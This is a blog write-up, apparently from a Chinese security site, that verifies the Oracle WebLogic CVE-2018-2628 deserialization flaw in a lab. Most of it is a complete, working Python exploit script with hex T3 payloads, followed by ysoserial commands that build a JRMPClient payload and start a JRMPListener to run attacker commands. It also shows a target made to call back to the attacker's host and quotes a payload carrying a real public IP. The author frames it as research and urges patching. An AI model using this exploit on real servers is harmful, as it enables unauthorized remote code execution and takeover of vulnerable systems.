WebLogic cve-2018-2628 Vulnerability Verification


PS: This verification is only for study and research, please do not use illegally.

I. Overview of the Vulnerability

In the early hours of April 18 (Beijing time), Oracle officially released its April Critical Patch Update (CPU), which includes a high-risk WebLogic deserialization vulnerability (CVE-2018-2628). Through this vulnerability an attacker can remotely execute code without authorization: the attacker only needs to send carefully constructed T3 protocol data to obtain the permissions of the target server. An attacker exploiting this vulnerability can take control of the affected component, impacting the availability, confidentiality and integrity of data.

II. Scope of Vulnerability Impact

The affected versions are:

Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 12.1.3.0
Oracle WebLogic Server 12.2.1.2
Oracle WebLogic Server 12.2.1.3

III. Status of Vulnerability Verification

A number of verification scripts for this vulnerability have already appeared on GitHub, but in most of them the payload field contains the IP address 104.251.228.50, which is geolocated to the United States, as follows:

In [2]: payload=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72'
   ...: '787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c'
   ...: '6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a617661'
   ...: '2e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c65720000000000'
   ...: '0000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e'
   ...: '03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea9'
   ...: '0b00000000000000000000000000000078']

In [3]: payload[0].decode('hex')
Out[3]: "\xac\xed\x00\x05s}\x00\x00\x00\x01\x00\x1djava.rmi.activation.Activatorxr\x00\x17java.lang.reflect.Proxy\xe1'\xda \xcc\x10C\xcb\x02\x00\x01L\x00\x01ht\x00%Ljava/lang/reflect/InvocationHandler;xpsr\x00-java.rmi.server.RemoteObjectInvocationHandler\x00\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00xr\x00\x1cjava.rmi.server.RemoteObject\xd3a\xb4\x91\x0ca3\x1e\x03\x00\x00xpw7\x00\nUnicastRef\x00\x0e104.251.228.50\x00\x00\x1bY\x00\x00\x00\x00\x01\xee\xa9\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x"
IV. My Vulnerability Verification

To that end, I set up a lab environment to test it and share the experience here (every IP address involved in the test is a lab environment address).

4.1 Vulnerability Verification Code

First, my code. It is single-threaded sample code only; anyone who wants multithreading can modify it themselves.

# coding:utf-8
# Single-threaded check script (Python 2: it relies on str.decode('hex') and the print statement).
import re
import sys
import socket
from time import sleep

VUL = ['cve-2018-2628']

# Requires a custom listener address; the address currently embedded is 11.10.67.83 (lab address).
PAYLOAD = [
    'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e5'
    '0726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78'
    '707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c6572000000000000000202000'
    '07872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707734000a556e696361737452656600'
    '0b31312e31302e36372e38330000044bffffffff981c9bd400000000000000000000000000000078'
]

# A vulnerable server answers with a java.lang.reflect.Proxy class name such as $Proxy0.
VER_SIG = [r'\$Proxy[0-9]+']


def t3handshake(sock, server_addr):
    sock.connect(server_addr)
    # 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n'
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    sleep(1)
    sock.recv(1024)
    sys.stdout.write('handshake successful\n')


def buildT3RequestObject(sock, dport):
    data1 = (
        '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b402797372007872017'
        '8720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765'
        '626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696'
        'e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e675061746368'
        '49000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f5374726'
        '96e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d77'
        '65626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e6'
        '96e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f'
        '537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616'
        'c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572'
        '766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044'
        'c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c'
        '65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc'
        '908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261'
        '727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b7'
        '87200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    )
    # {0} is replaced by the destination port as 4 hex digits.
    data2 = (
        '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797'
        '465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900'
        '056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684'
        'c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078'
        'fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3'
        '139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}'
        'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ed'
        'e121e2a0c0000787077200114dc42bd07'
    ).format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(d.decode('hex'))
    sleep(2)
    sys.stdout.write('send request payload successful, recv length: %d\n' % len(sock.recv(2048)))


def sendEvilObjData(sock, data):
    payload = (
        '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f6769637572047'
        '8700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c617373'
        '5461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d77656'
        '26c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a656374'
        '3b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792'
        'f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a61766'
        '12f6c616e672f4f626a6563743b78707702000078fe010000'
    )
    payload += data
    payload += (
        'fe010000aced0005737200257765626c6f676'
        '9632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e7072'
        '6f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e6'
        '96e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f'
        '6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    )
    # Prefix the T3 message with its total length (payload bytes plus the 4-byte length field).
    payload = '%s%s' % ('{:08x}'.format(len(payload) / 2 + 4), payload)
    sock.send(payload.decode('hex'))
    sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            sleep(0.1)
    except Exception:
        pass
    return res


def checkVul(res, server_addr, index):
    p = re.findall(VER_SIG[index], res, re.S)
    if len(p) > 0:
        return '[+] {}:{} is vul {}'.format(server_addr[0], server_addr[1], VUL[index])
    else:
        return '[-] {}:{} is not vul {}'.format(server_addr[0], server_addr[1], VUL[index])


def run(*args):
    dip = args[0]
    dport = args[1]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # After patching the server blocks, so set a timeout; the default here is 15s, adjust to your situation.
    sock.settimeout(15)
    server_addr = (dip, dport)
    t3handshake(sock, server_addr)
    buildT3RequestObject(sock, dport)
    rs = sendEvilObjData(sock, PAYLOAD[index])
    print checkVul(rs, server_addr, index)


def single():
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip, dport)


if __name__ == '__main__':
    index = 0
    single()
4.2 Payload Field Modifications

To change the address in the payload field of your code, generate the payload with ysoserial using the following command:

$ java -jar ysoserial-master.jar JRMPClient 11.10.67.83:1099 | xxd
00000000: aced 0005 737d 0000 0001 001a 6a61 7661  ....s}......java
00000010: 2e72 6d69 2e72 6567 6973 7472 792e 5265  .rmi.registry.Re
00000020: 6769 7374 7279 7872 0017 6a61 7661 2e6c  gistryxr..java.l
00000030: 616e 672e 7265 666c 6563 742e 5072 6f78  ang.reflect.Prox
00000040: 79e1 27da 20cc 1043 cb02 0001 4c00 0168  y.'. .C.....L..h
00000050: 7400 254c 6a61 7661 2f6c 616e 672f 7265  t.%Ljava/lang/re
00000060: 666c 6563 742f 496e 766f 6361 7469 6f6e  flect/Invocation
00000070: 4861 6e64 6c65 723b 7870 7372 002d 6a61  Handler;xpsr.-ja
00000080: 7661 2e72 6d69 2e73 6572 7665 722e 5265  va.rmi.server.Re
00000090: 6d6f 7465 4f62 6a65 6374 496e 766f 6361  moteObjectInvoca
000000a0: 7469 6f6e 4861 6e64 6c65 7200 0000 0000  tionHandler.....
000000b0: 0000 0202 0000 7872 001c 6a61 7661 2e72  ......xr..java.r
000000c0: 6d69 2e73 6572 7665 722e 5265 6d6f 7465  mi.server.Remote
000000d0: 4f62 6a65 6374 d361 b491 0c61 331e 0300  Object.a...a3...
000000e0: 0078 7077 3400 0a55 6e69 6361 7374 5265  .xpw4..UnicastRe
000000f0: 6600 0b31 312e 3130 2e36 372e 3833 0000  f..11.10.67.83..
00000100: 044b ffff ffff c56f 9b74 0000 0000 0000  .K.....o.t......
00000110: 0000 0000 0000 0000 0078                 .........x

Note that ysoserial requires the JDK to run. Run the above command to obtain your own payload, which in this case is

aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707734000a556e6963617374526566000b31312e31302e36372e38330000044bffffffff981c9bd400000000000000000000000000000078

and use it to replace the payload content in your code.

4.3 Vulnerability Verification

Start the JRMPListener with ysoserial on the listener host, passing the command that should be executed when the target connects back, as follows:

java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "command"

After running the above command, the experiment can begin formally. To verify the remote code execution effect of this vulnerability, for example on a Linux server with WebLogic installed, you can have the target run a curl command against a web server we built ourselves and then check the web log: if the IP address of the target machine appears in the log, the vulnerability has been exploited successfully. Finally, the verification result is posted below. The attacker in this test is 11.10.67.83 (lab private IP); both the JRMPListener and the web service run on this server.

Target machine: 11.10.138.61 (lab private IP)


Run the following command on the attacker against the target machine 11.10.138.61:

python test.py 11.10.138.61 7001

Output on the attacker 11.10.67.83:


The result can be seen in the web log on 11.10.67.83:


As you can see, exploiting this vulnerability made the target machine 11.10.138.61 access the web service of the attacker 11.10.67.83.

V. Conclusion

As the above experiment shows, this vulnerability really does allow remote code execution, and security and operations staff should be alert and fix it as soon as possible. Oracle has already released the corresponding patches for this vulnerability, and affected users are strongly advised to apply the update as soon as possible for protection.

The above validation is only for study and research, please do not use illegally.

Author: kaixin3000 (freebuf.com); please credit the source when reproducing.